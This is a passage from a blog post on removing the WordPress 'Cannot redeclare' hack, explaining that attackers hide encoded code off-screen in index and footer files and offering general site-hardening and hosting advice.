Disgusting stuff, and if you don’t see it at first, that doesn’t mean it’s not there. The scumbags who deal in this filth are clever enough to indent the code so it appears off-screen (via horizontal scrollbar). It’s a clever trick, but most text editors have a limit to the number of characters that appear on each line, so the super-long string of encoded gibberish wraps and becomes easy to spot:

Notice it there in the last line.. it’s like that for all teh files. And again, if you don’t see anything then look for it off-screen. Once you find it, delete it. Then repeat for all index and footer files on your server. Once you’ve done that the “Cannot redeclare” hack should be gone, but you should take steps to prevent future attacks..

Securing your WordPress site

For public websites, there is no such thing as perfect security. There are many ways to improve security, however, including finding a more secure host for your sites. In general, private or some sort of virtual private hosting is better than shared hosting (for many reasons), but it’s also more expensive. Hosting is one of those things where you get what you pay for.. so if you have the means, upgrading to a better, more secure host is the first thing I would consider.

Beyond switching hosts, there are a number of known effective measures you can take to improve the security of your site. There are many excellent resources available to help with site security (both for WordPress and in general), including an entire Lynda.com video/screencast series that focuses in-depth on devloping secure WordPress sites. Even more recently is Daniel Pataki’s Smashing WP article on securing your WordPress website. And if you want to hear it direct from the horse’s mouth, check out the good ‘ol fashioned WP Codex for info on hardening WordPress.

More help..

There’s currently not a lot of info on the “Cannot redeclare” hack, but this WP Forum thread provides some additional clues. If you have any information regarding this hack, or how it relates to the TimThumb hack, please leave a comment to share the information with others in the WP community. Thanks.